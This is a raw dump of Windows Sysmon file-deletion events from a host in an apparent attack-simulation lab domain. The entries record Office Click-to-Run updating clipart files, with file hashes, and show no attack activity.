Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\FLAP.WMFMD5=61A0CBEA19154EE23DF9FFB688AAE7F3,SHA256=4108EB323DA12E05693AC0304C916A3EE620A83D4EC5476EA8FCB3947D53E001,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065438Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.252{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\FINCL_02.MIDMD5=84865662EA5CB4AF151CA0D805796764,SHA256=44FAE3DD1E8C7B9D0FFB303E7BEAE390A71E21A5069D0F6B1E6DFEA857EE4378,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065437Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.252{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\FINCL_01.MIDMD5=9674C8316187CC7A53FEC44CAE9D2CE5,SHA256=6BD4BBAEEC303EBA7EEAD97E6E7C2FB0CFC98A1650289144A12D9ACC111A6414,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065436Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.252{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\FD02161_.WMFMD5=E9DABE48F87FE78E05D0DA8E9BDC2E3F,SHA256=1290225031A2F2E9A7ABE9C9A605E46FCB39521A8F55752E5C53E21331A5742B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065435Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.252{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\FD02158_.WMFMD5=AF01C2C2301ACA114F856BBFD581256A,SHA256=AE5C0D86ADA9EEC3D619E1D841ECD76AE35F7A29AC42AFC82A6C564BF8471B1E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065434Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\FD02153_.WMFMD5=ED2168B2F9DD3C4BC1C8BC2E778E4241,SHA256=CEC0C23C9B207080B50E15AC43C074675E4943C9BBD5B349D9C83A6177064FF8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065433Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\FD02141_.WMFMD5=5A8750EB7418CE77DC5765B9C78B86A5,SHA256=A5469EB70E9DF326A9FAB0AFE0E51B85DEEACB619938F0A6AC17CE16CB6FF68E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065432Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\FD02116_.WMFMD5=FE63CAAC61A5ACFFD306FFD736CA1600,SHA256=114A25EC2394242742FB86C58AA0858C62A986823D28DDC06670CC32CE30B56A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065431Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\FD02115_.WMFMD5=85299D36F18622FCE7025B4E801E77AA,SHA256=559AB97CBD9F9092FC2922123B7D1226BE219E943DFF828A585C8B291136FD20,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065430Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\FD02097_.WMFMD5=54B0677EEDAB60FE5258B3BF0A05E83F,SHA256=50BF763EB68344ADB88F0D7B7644A191D2916A449EA826EAFF68E64521AB7141,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065429Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\FD02088_.WMFMD5=DCA410211CB5C8CDBBDEABE2C6E5D8D4,SHA256=A8C4EEFE6634346B72C4A0CFA624A4EEE77D02FFC34952AE58532339545C51EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065428Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\FD02075_.WMFMD5=FCC28C5B39CFF5BC7D80C94009900497,SHA256=355BD24ED53202BD7EA964DD5FD4BBD9099AD8EE9601A56072E2C69C17AAD3C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065427Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\FD02071_.WMFMD5=F97337885C426F97B6D3C1600D14E7FD,SHA256=10A367E5C31F43E06FB20CCE63A1E463D47BD6C76CC92A04FDB31F2F678D6C17,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065426Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\FD02068_.WMFMD5=EE12E12887FBA5695B438C6873D12D26,SHA256=2EB5465C4D394BCC29863DF317BE8A2ECFE906D40919F54D28518E2628BFD3A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065425Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\FD01660_.WMFMD5=DE54ADEBB4737C7BDE7045FF2F42EA7E,SHA256=9D6362FB573D0A05F88DF7861AB04EED9CC5267E0B96DDC34AE17291BC804F66,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065424Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\FD01659_.WMFMD5=906391789ED92593E7A2166183A26332,SHA256=44DB725B703555C5E58EEF777F2E1DA1F203D50C603681D4D99D4ABCB4FD9187,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065423Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\FD01658_.WMFMD5=F252EF84789F589E0D10E9B51D9F0804,SHA256=E10B5650925AC24F6DEE92D16310A546A011BB6F83DA3C9CD2371B8F846FC70B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065422Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\FD01657_.WMFMD5=62762F26D100AE355E61FD051E2BE82A,SHA256=1E60A782477DBAC02A9CB109D2597AD97F73B60360D37ACE804E69137071AF33,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065421Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\FD01548_.WMFMD5=B99864174F42D1C48FFB23CDB806FE80,SHA256=C171DDB1819D41E7FDA2E77C7F48C023ACF342F7ECD02FA014477651BC684443,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065420Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\FD01196_.WMFMD5=423A64520988449501C93C8DF3E65873,SHA256=78D70865D21980238184C2D23FB09A5D5A0ECCC4D15A9245DA9930B068A98084,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065419Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\FD01193_.WMFMD5=2C4B0F250AB7DDE3EB411D98982B87F6,SHA256=F9FF1C818FEAF6300291ACA4C5FE6302B06B43930ABB17DC8CAF51E63ED9C8E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065418Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\FD01191_.WMFMD5=0117EB4DACF079A139F52B3B1627308B,SHA256=D4AB92CC3EDB9BA246F801DD742CB2DE4AF86AB029BC37AFF9F5A950B204D909,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065417Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\FD01176_.WMFMD5=9427C1967CABBA82F864BDCA097EB0BB,SHA256=5FDC567692E0EB9CCDA3EA3A48A8ACA181E16F00A81C22CD46780273D7494CAB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065416Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\FD01084_.WMFMD5=AEB82BBB26526254E5A6C359A3C6B723,SHA256=E80B242167DACD8605DBDAFBB00D5B4BD1536E3801711FDDBDF25C56FF2C041C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065415Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\FD01074_.WMFMD5=990F1C672A512B6CA13154AF582235B9,SHA256=B42DBC4E09B84672F4AC52CE21B7A75BF1C5B195EFDB774D7A87D6A1AA135CA6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065414Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\FD00965_.WMFMD5=45B9F7802E6A903141D0F1FD96969D56,SHA256=7EDF942C04A64B9BC020D739FC45C74D8336702E7210888D20C63700F69B9746,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065413Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\FD00814_.WMFMD5=090F63FC5EC3C0FBC17DB63B4E2E5C44,SHA256=C193CD01E10E346789ABFA2232FF96AA61CE3460E27246D635325B64DDC10E97,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065412Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\FD00799_.WMFMD5=218DC071E88F6372D4E0BBE69E0CC2AA,SHA256=0B06437E58F4CF6CCD5D987684FE3C63982FE963FD77913C4BBE0D181A67752A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065411Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\FD00779_.WMFMD5=56E94B5F20B4765A7C3D7D829ABF24FF,SHA256=CE5A90B4D89A4278DEF22643E137BE9AE51AD9B09D2BBC961804F73B450F9129,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065410Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\FD00775_.WMFMD5=94BB1014FF4D110E8608E8C86FA70C71,SHA256=39C8F7334494A4BF61B8ECF2CF5D1F6F097E2B8145F19AEDDF3DAE54F66456FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065409Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\FD00586_.WMFMD5=64853C144B2F1A70DBD21930D42A4F08,SHA256=954D68233E73376276DAF61F3164DCD2B9A3430C1AB033BE12C42CA64434EDBA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065408Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\FD00564_.WMFMD5=B6DE6EB4CD7A14424972D6D302B529E7,SHA256=80FE2E38E00023C881EBA5C6D52D47E2BAB6BEBBEDC6E39C0E980CBA0E23D5CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065407Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\FD00544_.WMFMD5=B80BB0B4580D703138C47A69E1B7D7C0,SHA256=191A4B9B6B3A861426E804122EF803AAC03CCC36A077E9FB76C60CAF936D26D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065406Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\FD00543_.WMFMD5=2D4D6776AE6E55763B5E2AFB87A2787D,SHA256=20ABF7A1A9A08E5B397664A84AD21F267C488F5A72E516D059AA48ED4754E391,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065405Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.220{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D79E8F90891185CCDD22B0DC8E28D7D,SHA256=516AE4D3BE4B1F85D1BD16D73F2EAB27FE66BE4D99DE35C97BF40349A28EDBC4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065404Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\FD00459_.WMFMD5=5C5240A42E7171381A65A230E075CB30,SHA256=01AA1966C00DB68B20AF4F6F650EAF26F87374AFE433A30DB025A4B52ED93ECA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065403Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.205{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\FD00455_.WMFMD5=D3EAC6587E8EC0B76D62078FA5B3623D,SHA256=4929C9D0527C0B8749D5A2EADA42C90BC4ED1933A7D4C4BB9126D1777E900CD1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065402Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.205{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\FD00438_.WMFMD5=FE3D427A3760563A4855D024333E3751,SHA256=23C38DD4905627EC4EC0CABAF4A7BA1502B3F7360978EE00DF3921690CD083F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065401Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.205{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\FD00435_.WMFMD5=B8BEF879587B55DED77F69839D2AFA2E,SHA256=B97D087BB4521FE9807B845789835873517C6DABBAA22D75BBFC3445B808FE2C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065400Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.205{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\FD00428_.WMFMD5=81B7E9FB1BB2AB04F3FB71CF419EAF61,SHA256=128328BCD38319B4323DBFF966558E4C19A82C61FFC5251DF5A1C8085B3117C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065399Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.205{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\FD00419_.WMFMD5=D2DCBCD2C217F3BBE60BB702176C404D,SHA256=E4BBB9543C60699154DD01FFF8436945B664FB64CEA6D2544B4C8725EDFE4DA1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065398Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.205{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\FD00414_.WMFMD5=4004D8AC0E0CC7E420C9F71279CCF673,SHA256=E8F22B879F0A6A0A35AADC5A7744AA6680C0A98BD2822951AA22E1809699AAB7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065397Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.205{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\FD00403_.WMFMD5=941539F5FB4DAE4E30943CA4CE17ECC6,SHA256=3FB11FEF47D2231C31AF9E9ADBF0497B3AD70EC16CDFFB71B57E56EE5E9666E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065396Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.205{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\FD00397_.WMFMD5=9EE5CDA10B3D403870F30FB401FCFC97,SHA256=316201E19FF3F6FBEC3A95277CD9551C4FF72D42648A8A211ABC64F755E9D534,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065395Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.205{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\FD00382_.WMFMD5=51D7006E5E1F7867EDD33ADA4CF950C5,SHA256=BAAA3E7105A853111C178B0E52A62D21DFD6604E2B81DB97080DA1C359137AAF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065394Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 